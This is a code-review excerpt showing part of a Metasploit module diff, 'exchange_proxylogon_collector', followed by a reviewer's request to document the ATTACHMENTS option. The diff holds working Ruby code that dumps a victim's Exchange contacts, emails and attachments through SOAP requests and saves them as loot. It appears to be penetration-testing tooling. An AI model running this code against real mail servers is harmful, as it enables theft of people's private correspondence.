modules/auxiliary/gather/exchange_proxylogon_collector.rb

```diff
@@ -0,0 +1,328 @@
+      print_status(" * number of contact found: #{total_count}")
+
+      if total_count.to_i > datastore['MaxEntries']
+        print_warning(" * number of contact recaluled due to max entries: #{datastore['MaxEntries']}")
+        total_count = datastore['MaxEntries'].to_s
+      end
+      print_status
+
+      response = post_xml(soap_listitems(action['id_attribute'], total_count))
+      xml = Nokogiri::XML.parse(response.body)
+
+      print_status(message("Processing dump of #{total_count} items"))
+      data = xml.xpath('//t:Items/t:Contact', XMLNS)
+      if data.empty?
+        print_status(' * the user has no contacts')
+      else
+        write_loot("#{datastore['EMAIL']}_#{action['id_attribute']}", data.to_s)
+      end
+    end
+  end
+
+  def dump_emails
+    response = post_xml(soap_countitems(datastore['FOLDER']))
+    if response.body =~ /Success/
+      print_status(message('Connection established'))
+
+      xml = Nokogiri::XML.parse(response.body)
+      folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS).values[0]
+      print_status(" * selected folder: #{datastore['FOLDER']} (#{folder_id})")
+
+      total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS).content
+      print_status(" * number of email found: #{total_count}")
+
+      if total_count.to_i > datastore['MaxEntries']
+        print_warning(" * number of email recaluled due to max entries: #{datastore['MaxEntries']}")
+        total_count = datastore['MaxEntries'].to_s
+      end
+      print_status
+
+      print_status(message("Processing dump of #{total_count} items"))
+      download_items(total_count)
+    end
+  end
+
+  def download_attachments(item_id)
+    response = post_xml(soap_listattachments(item_id))
+    xml = Nokogiri::XML.parse(response.body)
+
+    xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).select do |item|
+      item_id = item.at_xpath('./t:AttachmentId', XMLNS).values[0]
+
+      response = post_xml(soap_downattachment(item_id))
+      data = Nokogiri::XML.parse(response.body)
+
+      filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS).content
+      ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS).content
+      content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS).content
+
+      print_status(" * download attachment: '#{filename}'")
+      write_loot("#{datastore['EMAIL']}_#{datastore['FOLDER']}", Rex::Text.decode_base64(content), filename, ctype)
+    end
+  end
+
+  def download_items(total_count)
+    response = post_xml(soap_listitems(datastore['FOLDER'], total_count))
+    xml = Nokogiri::XML.parse(response.body)
+
+    xml.xpath('//t:Items/t:Message', XMLNS).select do |item|
+      item_info = item.at_xpath('./t:ItemId', XMLNS).values
+      print_status(" * download: #{item_info[1]}")
+
+      attachments = item.at_xpath('./t:HasAttachments', XMLNS).content
+      if datastore['ATTACHMENTS'] && attachments == 'true'
```

Comment:
It would be a good idea to describe the `ATTACHMENTS` option in the documentation.